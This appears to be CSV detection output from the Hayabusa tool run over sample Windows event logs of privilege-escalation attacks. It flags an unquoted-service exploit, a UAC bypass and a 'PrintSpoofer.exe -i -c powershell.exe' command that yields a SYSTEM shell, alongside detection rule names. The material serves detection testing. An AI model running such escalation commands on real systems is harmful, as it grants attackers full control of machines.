-s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k 
netsvcs -p -s LanmanServer : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit : Command: c:\Program Files\vulnsvc\mmm.exe : Path: C:\program.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx 
+2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: 
NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.340 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx +2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx 
